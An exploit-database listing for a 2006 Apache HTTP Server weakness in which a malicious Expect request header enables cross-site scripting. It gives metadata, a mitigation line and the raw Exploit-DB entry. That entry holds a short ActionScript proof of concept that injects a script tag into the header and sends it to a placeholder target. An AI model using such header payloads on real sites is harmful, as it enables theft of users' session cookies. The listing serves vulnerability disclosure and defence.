header-logo
Suggest Exploit
vendor:
HTTP Server
by:
SecurityFocus
7.5
CVSS
HIGH
Cookie-based Authentication Credentials Theft
20
CWE
Product Name: HTTP Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Apache HTTP Server Security Weakness

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks by sending a malicious HTTP request header containing a script tag with an alert statement.

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in HTTP request headers.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19661/info

Apache HTTP server is prone to a security weakness related to HTTP request headers.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");

Navigation

Suggest Exploit

Services By CQR